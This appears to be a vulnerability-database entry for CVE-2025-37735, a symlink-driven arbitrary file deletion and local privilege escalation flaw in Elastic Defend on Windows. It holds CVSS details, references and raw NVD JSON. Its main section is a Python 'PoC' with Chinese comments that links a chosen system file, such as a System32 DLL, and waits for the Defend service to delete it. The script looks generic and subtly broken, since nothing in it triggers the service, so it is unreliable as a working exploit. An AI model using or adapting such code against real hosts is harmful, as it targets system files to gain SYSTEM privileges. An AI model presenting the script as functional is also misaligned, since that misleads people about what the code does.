CVE-2025-37735

Description

Improper preservation of permissions in Elastic Defend on Windows hosts can lead to arbitrary files on the system being deleted by the Defend service running as SYSTEM. In some cases, this could result in local privilege escalation.

CVSS Details

CVSS Score

7.0

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Elastic Defend 8.x < 8.19.6/9.1.6/9.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-37735 PoC - Elastic Defend权限提升漏洞利用
# 攻击者通过符号链接诱导Defend服务删除系统文件

import os
import sys
import time

def create_symlink_attack(target_file, fake_file):
    """
    创建符号链接攻击场景
    target_file: 要删除的系统文件
    fake_file: 攻击者控制的文件路径
    """
    try:
        # 创建攻击者控制的目录和文件
        if not os.path.exists(fake_file):
            os.makedirs(os.path.dirname(fake_file), exist_ok=True)
            with open(fake_file, 'w') as f:
                f.write('malicious content for deletion')
        
        # 创建符号链接指向目标系统文件
        # 注意：需要SeCreateSymbolicLinkPrivilege
        os.symlink(target_file, fake_file + '_link')
        
        print(f'[*] Symlink created: {fake_file}_link -> {target_file}')
        print(f'[*] Waiting for Elastic Defend to process the file...')
        
        # 监控文件状态
        for i in range(30):
            if not os.path.exists(target_file):
                print(f'[+] Target file deleted: {target_file}')
                return True
            time.sleep(1)
        
        print('[-] Target file still exists, exploit may have failed')
        return False
        
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

def main():
    if len(sys.argv) < 3:
        print('Usage: python cve_2025_37735_poc.py <target_file> <fake_file>')
        print('Example: python cve_2025_37735_poc.py C:\\Windows\\System32\\some.dll C:\\Users\\Public\\malicious.dll')
        sys.exit(1)
    
    target = sys.argv[1]
    fake = sys.argv[2]
    
    print(f'[*] CVE-2025-37735 Elastic Defend Privilege Escalation PoC')
    print(f'[*] Target: {target}')
    print(f'[*] Fake path: {fake}')
    
    create_symlink_attack(target, fake)

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-37735
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-37735
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-37735/
[4] VulDB https://vuldb.com/cve/CVE-2025-37735
[5] https://discuss.elastic.co/t/elastic-defend-8-19-6-9-1-6-and-9-2-0-security-update-esa-2025-23/383272

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-37735", "sourceIdentifier": "[email protected]", "published": "2025-11-06T15:15:46.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper preservation of permissions in Elastic Defend on Windows hosts can lead to arbitrary files on the system being deleted by the Defend service running as SYSTEM. In some cases, this could result in local privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}]}], "references": [{"url": "https://discuss.elastic.co/t/elastic-defend-8-19-6-9-1-6-and-9-2-0-security-update-esa-2025-23/383272", "source": "[email protected]"}]}}